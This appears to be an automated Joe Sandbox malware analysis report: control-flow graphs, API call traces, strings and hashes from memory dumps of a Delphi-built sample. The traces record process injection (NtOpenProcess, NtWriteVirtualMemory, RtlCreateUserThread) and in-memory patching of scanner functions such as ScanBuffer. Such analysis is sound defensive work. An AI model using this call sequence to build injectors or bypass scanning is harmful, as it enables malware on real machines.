                                                                                                     control_flow_graph 4106 3308e64-3308e67 4107 3308e6c-3308e71 4106->4107 4107->4107 4108 3308e73-3309500 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32cfcb0 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 GetModuleHandleW GetProcAddress call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 NtOpenProcess call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b2f9c call 32b2fc4 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4107->4108 4325 3309506-33096f1 GetCurrentProcess call 32cfb88 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4108->4325 4326 330aa4f-330ac14 call 32cfce0 * 7 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4108->4326 4325->4326 4446 33096f7-3309727 call 32c97c8 IsBadReadPtr 4325->4446 4437 330ac19-330ac56 call 32b47ac * 3 4326->4437 4446->4326 4453 330972d-3309732 4446->4453 4453->4326 4454 3309738-3309754 IsBadReadPtr 4453->4454 4454->4326 4455 330975a-3309763 4454->4455 4455->4326 4456 3309769-330978f 4455->4456 4456->4326 4457 3309795-330990e GetCurrentProcess call 32cfb88 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4456->4457 4457->4326 4502 3309914-3309a8a call 32cfb88 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4457->4502 4547 3309a90-3309c8f call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 3308cf0 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4502->4547 4548 330a8fc-330aa4a call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4502->4548 4648 3309c95-3309c96 4547->4648 4649 3309e2d-3309f8b call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4547->4649 4548->4326 4650 3309c9a-3309e11 call 3308cf0 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4648->4650 4734 3309fb7-330a8d6 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 3308cfc call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 GetModuleHandleW GetProcAddress call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 NtWriteVirtualMemory call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 GetModuleHandleW GetProcAddress call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 RtlCreateUserThread call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4649->4734 4735 3309f8d-3309fb2 call 3308c40 4649->4735 4741 3309e16-3309e27 4650->4741 5007 330a8db-330a8e2 4734->5007 4735->4734 4741->4649 4741->4650 5007->4326 5008 330a8e8-330a8f7 CloseHandle 5007->5008 5008->4326
                                                                                                    APIs
                                                                                                      • Part of subcall function 032CFD40: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD78
                                                                                                      • Part of subcall function 032CFD40: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD86
                                                                                                      • Part of subcall function 032CFD40: GetProcAddress.KERNEL32(74F60000,00000000), ref: 032CFD9F
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDBB
                                                                                                      • Part of subcall function 032CFD40: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDC1
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDEB
                                                                                                      • Part of subcall function 032CFD40: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDF1
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000), ref: 032CFDFA
                                                                                                      • Part of subcall function 032CFD40: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000), ref: 032CFE00
                                                                                                      • Part of subcall function 032CFD40: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000), ref: 032CFE0B
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtOpenProcess,ScanBuffer,03330350,0330AC74,ScanString,03330350,0330AC74,ScanBuffer,03330350,0330AC74,ScanString,03330350,0330AC74,OpenSession,03330350), ref: 033090DD
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 033090E3
                                                                                                    • NtOpenProcess.NTDLL(033307E0,001F0FFF,03330330,03330348), ref: 033091C3
                                                                                                      • Part of subcall function 032B2F9C: QueryPerformanceCounter.KERNEL32 ref: 032B2FA0
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,00000078,00000000,00000000), ref: 03309516
                                                                                                      • Part of subcall function 032CFB88: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 032CFB95
                                                                                                      • Part of subcall function 032CFB88: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032CFB9B
                                                                                                      • Part of subcall function 032CFB88: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 032CFBBB
                                                                                                    • IsBadReadPtr.KERNEL32(14D50000,00000040,?,?,00000078,00000000,00000000), ref: 03309720
                                                                                                    • IsBadReadPtr.KERNEL32(?,000000F8,14D50000,00000040,?,?,00000078,00000000,00000000), ref: 0330974D
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,17D49400,00003000,00000040,?,000000F8,14D50000,00000040,?,?,00000078,00000000,00000000), ref: 033097A4
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,03330350,0330AC74,ScanBuffer,03330350,0330AC74,ScanBuffer,03330350,0330AC74,OpenSession,03330350,0330AC74,ScanBuffer,03330350), ref: 0330A304
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0330A30A
                                                                                                    • NtWriteVirtualMemory.NTDLL(068B0000,068B0000,15450000,17D49400,00000000,OpenSession,03330350,0330AC74,UacInitialize,03330350,0330AC74,UacScan,03330350,0330AC74,00000000,C:\Windows\System32\ntdll.dll), ref: 0330A48C
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,RtlCreateUserThread,ScanString,03330350,0330AC74,UacScan,03330350,0330AC74,OpenSession,03330350,0330AC74,ScanBuffer,03330350,0330AC74), ref: 0330A65C
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0330A662
                                                                                                    • RtlCreateUserThread.NTDLL(068CF070,00000000,00000000,00000000,00000000,00000000,068CF070,00000000,033307BC,00000000,ScanString,03330350,0330AC74,OpenSession,03330350,0330AC74), ref: 0330A7F7
                                                                                                    • CloseHandle.KERNEL32(00000884,ScanBuffer,03330350,0330AC74,OpenSession,03330350,0330AC74,?,?,00000078,00000000,00000000), ref: 0330A8F2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleProcess$AddressCurrentModuleProc$MemoryVirtual$LibraryReadWrite$AllocateCacheCloseCounterCreateFlushFreeInstructionLoadOpenPerformanceProtectQueryThreadUser
                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Windows\System32\ntdll.dll$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtOpenProcess$NtSetSecurityObject$NtWriteVirtualMemory$OpenSession$RtlCreateUserThread$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
                                                                                                    • API String ID: 2432997404-1975312874
                                                                                                    • Opcode ID: c31e8fd8b182c4bb0c2d4bb9cc068f77df689377d55ed2760bd581f228124e09
                                                                                                    • Instruction ID: fa854880682b7dbfad922c645984f80b808a0545338a5489b073c2ac3308ba07
                                                                                                    • Opcode Fuzzy Hash: c31e8fd8b182c4bb0c2d4bb9cc068f77df689377d55ed2760bd581f228124e09
                                                                                                    • Instruction Fuzzy Hash: 50F2FB38A203199FDB15FB69DDD0BCEB3B9AF44740F1141A5E008EF256DAB0AE818F55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5009 32b5ddc-32b5e1d GetModuleFileNameA RegOpenKeyExA 5010 32b5e5f-32b5ea2 call 32b5c18 RegQueryValueExA 5009->5010 5011 32b5e1f-32b5e3b RegOpenKeyExA 5009->5011 5016 32b5ec6-32b5ee0 RegCloseKey 5010->5016 5017 32b5ea4-32b5ec0 RegQueryValueExA 5010->5017 5011->5010 5012 32b5e3d-32b5e59 RegOpenKeyExA 5011->5012 5012->5010 5014 32b5ee8-32b5f19 lstrcpynA GetThreadLocale GetLocaleInfoA 5012->5014 5018 32b5f1f-32b5f23 5014->5018 5019 32b6002-32b6009 5014->5019 5017->5016 5020 32b5ec2 5017->5020 5022 32b5f2f-32b5f45 lstrlenA 5018->5022 5023 32b5f25-32b5f29 5018->5023 5020->5016 5024 32b5f48-32b5f4b 5022->5024 5023->5019 5023->5022 5025 32b5f4d-32b5f55 5024->5025 5026 32b5f57-32b5f5f 5024->5026 5025->5026 5027 32b5f47 5025->5027 5026->5019 5028 32b5f65-32b5f6a 5026->5028 5027->5024 5029 32b5f6c-32b5f92 lstrcpynA LoadLibraryExA 5028->5029 5030 32b5f94-32b5f96 5028->5030 5029->5030 5030->5019 5031 32b5f98-32b5f9c 5030->5031 5031->5019 5032 32b5f9e-32b5fce lstrcpynA LoadLibraryExA 5031->5032 5032->5019 5033 32b5fd0-32b6000 lstrcpynA LoadLibraryExA 5032->5033 5033->5019
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,032B0000,0331A794), ref: 032B5DF8
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,032B0000,0331A794), ref: 032B5E16
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,032B0000,0331A794), ref: 032B5E34
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 032B5E52
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,032B5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 032B5E9B
                                                                                                    • RegQueryValueExA.ADVAPI32(?,032B6048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,032B5EE1,?,80000001), ref: 032B5EB9
                                                                                                    • RegCloseKey.ADVAPI32(?,032B5EE8,00000000,?,?,00000000,032B5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 032B5EDB
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 032B5EF8
                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 032B5F05
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 032B5F0B
                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 032B5F36
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 032B5F7D
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 032B5F8D
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 032B5FB5
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 032B5FC5
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 032B5FEB
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 032B5FFB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                    • API String ID: 1759228003-2375825460
                                                                                                    • Opcode ID: d996a6017fb983c6e21580112a004b2a7852a110a9dcda8dc0a1f16d31d8dd54
                                                                                                    • Instruction ID: d35a1f9bb04da3b2787af7d0589dbf498bf176297bad17ed8bdb0ddbbd88f0b8
                                                                                                    • Opcode Fuzzy Hash: d996a6017fb983c6e21580112a004b2a7852a110a9dcda8dc0a1f16d31d8dd54
                                                                                                    • Instruction Fuzzy Hash: 0D51B875A2035D7EFB21D6A4CC46FEFB7BC9B057C0F1404A1A644EA181D7B4AAD48BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD78
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD86
                                                                                                    • GetProcAddress.KERNEL32(74F60000,00000000), ref: 032CFD9F
                                                                                                    • GetCurrentProcess.KERNEL32(0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDBB
                                                                                                    • NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDC1
                                                                                                    • GetCurrentProcess.KERNEL32(0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDEB
                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDF1
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000), ref: 032CFDFA
                                                                                                    • NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000), ref: 032CFE00
                                                                                                    • FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000), ref: 032CFE0B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess$LibraryMemoryVirtual$AddressCacheFlushFreeHandleInstructionLoadModuleProcProtectWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 2600374472-0
                                                                                                    • Opcode ID: 4ac48016fcb03db99a80946104659b8a96a6c0b4a25e2e96cee81e3783999ea9
                                                                                                    • Instruction ID: 58c270208effd906b3448608247616552ec79441764dcb009ae98cac7587931b
                                                                                                    • Opcode Fuzzy Hash: 4ac48016fcb03db99a80946104659b8a96a6c0b4a25e2e96cee81e3783999ea9
                                                                                                    • Instruction Fuzzy Hash: 2C219D79770348BFCA04FBE4CD92F9E76BCEB04B50F508415B104AF292CBB499808715
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 032CFB95
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032CFB9B
                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 032CFBBB
                                                                                                    Strings
                                                                                                    • NtAllocateVirtualMemory, xrefs: 032CFB8B
                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 032CFB90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                    • API String ID: 421316089-2206134580
                                                                                                    • Opcode ID: 1426a091a5044ef139cebf26350590e776761e8f46431fa7443c78462a461782
                                                                                                    • Instruction ID: 6fb5188ac1394d1885563d349ab429786a1ccc24e4cd6d0ce1c25e63275ba3a0
                                                                                                    • Opcode Fuzzy Hash: 1426a091a5044ef139cebf26350590e776761e8f46431fa7443c78462a461782
                                                                                                    • Instruction Fuzzy Hash: 9AE09A76250248BFCB40EF98D995EDB77ECAB1C750F408015BA19D7501D770E9508B61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 032CFB95
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032CFB9B
                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 032CFBBB
                                                                                                    Strings
                                                                                                    • NtAllocateVirtualMemory, xrefs: 032CFB8B
                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 032CFB90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                    • API String ID: 421316089-2206134580
                                                                                                    • Opcode ID: 9871ee2b425a2d8dfbc92c361764f12e96afc997c07bb006f24264c6a05ccac7
                                                                                                    • Instruction ID: 88c97a0e152bd5d523058e6f105397192d34aebc542929b3459f9c90cedb328c
                                                                                                    • Opcode Fuzzy Hash: 9871ee2b425a2d8dfbc92c361764f12e96afc997c07bb006f24264c6a05ccac7
                                                                                                    • Instruction Fuzzy Hash: B4E09A76150248BFCB40EF98D995EDB77ECAB1C750F408015BA19D7501D770E5508B61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 032B5228: SysAllocStringLen.OLEAUT32(?,?), ref: 032B5236
                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0330B850), ref: 0330B7BB
                                                                                                    • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0330B850), ref: 0330B7EB
                                                                                                    • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0330B800
                                                                                                    • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0330B82C
                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0330B835
                                                                                                      • Part of subcall function 032B4F68: SysFreeString.OLEAUT32(0330C964), ref: 032B4F76
                                                                                                    Memory Dump Source
